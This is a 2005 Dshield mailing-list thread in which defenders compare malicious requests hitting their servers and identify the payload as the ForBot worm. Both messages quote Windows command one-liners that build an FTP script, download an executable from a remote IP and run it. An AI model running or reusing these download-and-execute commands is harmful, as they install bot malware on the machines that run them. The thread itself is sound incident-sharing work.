[Dshield] Anyone seen wiit.exe?
gboyce at badbelly.com
Mon Aug 29 21:41:39 GMT 2005
I was just hit with a similiar type of request:
echo open 22.214.171.124 10051>>o&echo h>>o&echo h>>o&echo get
cool.exe>>o&echo bye>>o&ftp -n -s:o&cool.exe&del o&exit
I connected to the ftp server and grabbed cool.exe. Submitting it for
scanning revealed it is Win32.HLLW.ForBot.
Yours might be a different variant, but you should be able to use the same
method to figure out what it is.
On Mon, 29 Aug 2005, bgreenwood wrote:
> Over about the past two weeks or so I have noticed the following being
> base64 encoded in the URI of some incoming requests to my site...
> cmd /k echo open 126.96.36.199 17113 > o&echo user 1 1 >> o &echo get
> wiit.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &wiit.exe
> I have seen this activity before but with different filenames being
> called out. I don't recall seeing the wiit.exe or know exactly what it
> is supposed to be doing. Has anyone seen this or know what it is
> supposed to be doing once executed?
More information about the list